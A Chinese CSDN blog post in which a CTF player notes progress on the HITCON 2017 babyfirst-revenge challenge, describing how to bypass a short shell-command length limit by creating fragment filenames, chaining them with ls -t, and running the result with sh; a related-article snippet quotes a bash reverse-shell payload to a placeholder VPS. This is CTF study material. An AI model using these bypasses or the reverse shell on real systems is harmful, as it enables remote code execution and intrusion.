HITCON 2017 babyfirst-revenge(命令执行绕过三)

最新推荐文章于 2023-01-03 15:58:03 发布
最新推荐文章于 2023-01-03 15:58:03 发布
阅读量890 收藏
点赞数
分类专栏: WEB学习 文章标签: ctf web linux 修炼日记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/like98k/article/details/80161302
版权

今天写了下红帽杯要交的wp,颓废了一会儿,喷了一发iscc,然后ak了iscc目前放的题。开始今天的修炼了。其实已经12点,注定今天又做不了多少。估计要被梅子酒笑话了md...

再理一下之前有的思路:

1.利用'>'+'字符'+'\'+'\'几个字符创建文件(ps:'\'是会把后面的转义掉的,所以如果要让他出现在文件名中,就得用两个\\

2.使用ls串接命令可以用ls -t   (ps:ls -t:用文件和目录的更改时间排序)

4.使用ls>x(文件名),来把列出的文件名写入x文件内容,用ls>>y(文件名),这是

将刚刚创建的文件名按照字典序写入y文件 这里的字典序是特殊符号在ls\的前面 所以在生成ls\之后我们要先ls>x 保证ls\在最前面

5.最后我们需要生成我们自己的命令的时候直接sh y就可以在x文件里面生成我们想要的命令了 然后再sh x就可以rce了

6.差点忘了,因为是通过ls写内容写文件,所以在生成自己的命令时要注意各个命令段之间名字不能相同 因为不能生成两个带有相同命令段的文件名。

总结:linux命令学的太弱了!接下来就是构造curl请求以及执行文件的操作了,orz这个也不会,明天学一波!

ps:

因为要ISCC,国赛的wp就鸽了,感觉国赛连毛都没学到,WEB狗体验极差,红帽杯的话ak掉下一波iscc题会补上。

 


 

 

郁离歌
关注
专栏目录
BabyFirst-Revenge
heySister
09-15 867
前几天做ctf交流群的入门题…然后顺着就找到了BabyFirst系列的题目,所以打算做一做。 首先,参考了https://www.jianshu.com/p/a77e956d9941 ,里面也有对应HITCON各年比赛的docker环境,方便复现题目。 打开页面,代码很短,而且就很直白地告诉我们,这里可以有命令执行,就看能不能绕过。 <?php $sandbox = '/w...
HITCON2017 babyfirst-revenge v2
forbidd3n,keep going
05-22 589
被5虐过后,现在到4了,没想到难度大很多,这些就记一下总结下来的方法和姿势。先总结ls -t的方法,后面再补充tar的姿势。 1、构造ls -t 在上一题中我们大概知道了构造ls -t的要素,但是在本题中,由于长度的进一步限制,`ls>>_`将无法使用。这就要使用到其他技巧。 技巧0:* 在当前工作目录下使用*命令,会将目录名当作命令执行(顺序) 执行*即-t ...
Babyfirst-Revenge
Da2kSupr3m3的博客
01-03 609
[HITCON 2017]Babyfirst-Revenge v1&v2
HITCON 2017 babyfirst-revenge命令执行绕过四)
郁离歌丶的博客
05-03 704
中午睡了一觉,醒来两点多了,发现几个群里又有人在黑我这个萌新菜比了.....然后用两个多小时ak了iscc放的题,这让我忍不住再次喷一波iscc...老子都ak了排名还5、60名...就因为昨天写红帽杯要交的wp没打....我真tm无语...算了算了不喷了。开始今天的修炼!在远程放好如下内容:bash -c "bash -i >& /dev/tcp/vpsip/vpsport 0&l...
HITCON2017 babyfirst-revenge
forbidd3n,keep going
07-01 3311
初看这题,完全没有思路???!!!没辙,只能找大佬,看了网上各路大神的思路,从看不懂writeup到慢慢理解原理,学习了~多数writeup思路差不多,总归是利用\来多次输入命令绕过长度限制,有的人直接curl xxx(不用ls -t这个我没有成功,因为是在构造不出ip地址各种进制的序列问题),痛苦~~关键一:绕过5位长度限制要想绕过长度限制执行多条命令,显然会想到先将命令放到文件中取执行。第一...
HITCON2017 BabyFirst Revenge (短命令执行
a3320315的博客
01-12 952
0x01 源码 <?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if (isset($_GET['cmd']) && strlen($_GET['cmd']) <=...
Hitcon2017 babyfirst-revenge复现
0verWatch的博客
09-06 2840
前言 开学了还是得学习的,复现一波题目来玩玩,其实是实力不够不能去打网鼎杯emmm 正文 先从Hitcon2017 babyfirst-revenge这一个题目,总结一下还是学到很多东西的 复现地址 https://github.com/Pr0phet/hitconDockerfile/tree/master/hitcon-ctf-2017/babyfirst-revenge 这是题目回...
Hitcon2017 babyfirst-revenge v2复现
0verWatch的博客
09-18 1111
这个题目的条件更加苛刻了,先放个源码 &lt;?php $sandbox = '/www/sandbox/' . md5("orange" . $_SERVER['REMOTE_ADDR']); @mkdir($sandbox); @chdir($sandbox); if (isset($_GET['cmd']) &amp;&amp; strlen($_GET['c...
HITCON CTF 2017
11-08
HITCON CTF 2017 所有题目整理...............................................................................................................................................................................
[HITCON 2017]SSRFme
feng的博客
12-12 1026
知识点 代码审计 SSRF WP 其实是一道很简单的SSRF的题目,但是自己又没完完全全的做出来,卡在了一些奇奇怪怪的地方。 首先进入环境审一下代码: <?php if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) { $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']); $_SERVER['REMOTE_ADDR'] = $http_x_headers[0]; }
hitcon_2017_ssrfme
o3Ev的博客
05-02 410
hitcon_2017_ssrfme 题目: 打开环境,得到: <?php $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]); @mkdir($sandbox); @chdir($sandbox); $data = shell_exec("GET " . escapeshellarg($_GET["url"])); $info = pathinfo($_GET["file
HITCON 2017 babyfirst-revenge命令执行绕过二)
郁离歌丶的博客
04-30 1027
昨天不知道怎么了忘记发出去了,和今天的合起来一起发23333333今天国赛,体验了一把被二进制大手子带飞的感觉。贼爽。web1太简单,web2太难,web+pwn我就没做出来过。然后国赛也成为二进制的舞台了(就好像什么比赛不是二进制的天下一样。所以我这只狗又来学web了。接上昨天的,我想本地搭一个,但是想了好久,到底怎么弄,我想看看实现好的环境。搜一波发现有人用docker搭过了。但是我是win1...
hitcon 2017 ghost in the heap解题记录
qq_35467337的博客
03-08 415
hitcon 2017的ghost in the heap是4ngleboy这位日堆大佬出的题目,处于艰难看懂writeup的解断
BabyFirst-Revenge-V2 Writeup
heySister
09-19 865
BabyFirst-Revenge-V2 题目进行升级,允许输入的长度变成4,那之前的ls&gt;&gt;B 命令就无法绕过对长度对限制了。 用到的知识点: 1. Linux下使用 * 的作用:匹配当前目录下的文件名,并执行拼接后的语句; 2. dir指令和ls指令的功能相同,都是以字典序将所在目录下的文件名输出; 3. rev指令可以将某一文件内容以倒序输出。 *指令执行结果: (相当于执行...
hitcon_2014_stkof详解
像初雪一样自由洒落
04-20 1739
本文主要列出hitcon2014_stkof的详细过程 主要参考:unlink 系列 程序流程 allocate:分配一个指定size大小的块,返回idx。 其中块的指针信息保存在一个全局变量0x602140中 fill:根据idx找到对应的块,重新给定大小size,读入内容content free:释放idx的块 漏洞分析 由于fill时候的size可以重新制定,可以造成堆溢出。 没有打印函数 有一个全局变量 方法:unlink unlink,控制全局变量内容 修改chunk1指.
SQL注入之报错注入的一些随笔
郁离歌丶的博客
03-21 4539
0x00.序言关于报错注入的话虽然我在我之前的文章里面写了一些,但是sql注入的姿势实在是太多了。之前写过的payload不全也不系统。今天抽出时间来总结一下。ps:关于报错注入的原理和使用的基本函数我在我之前的文章《SQLI-LABS修炼笔记(二)》中已经详细说过了,如果不懂可以去看看。ps的ps:这里以SQLI-LABS的LESS-5为例题作为示范。0x01.floor()报错注入http:/...
CTF-web 第十部分 命令注入
热门推荐
iamsongyu的博客
11-25 1万+
一 、基本原理 命令注入指的是,利用没有验证过的恶意命令或代码,对网站或服务器进行渗透攻击。 注入有很多种,并不仅仅只有SQL注入。比如: 命令注入(Command Injection) Eval 注入(Eval Injection) 客户端脚本攻击(Script Insertion) 跨网站脚本攻击(Cross Site Scripting, XSS) SQL 注入攻击(SQL ...
[hitcon 2017]ssrfme 1
最新发布
04-11
这道题目是一个SSRF漏洞题目。SSRF全称为Server Side Request Forgery,是一种常见的Web安全漏洞。当存在SSRF漏洞时,攻击者可以将服务器作为代理,进而访问在内部网络中无法访问的资源,如内部Web应用、数据库等。此题的目标是通过一个输入参数包含的URL,探测出内部的flag并输出。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值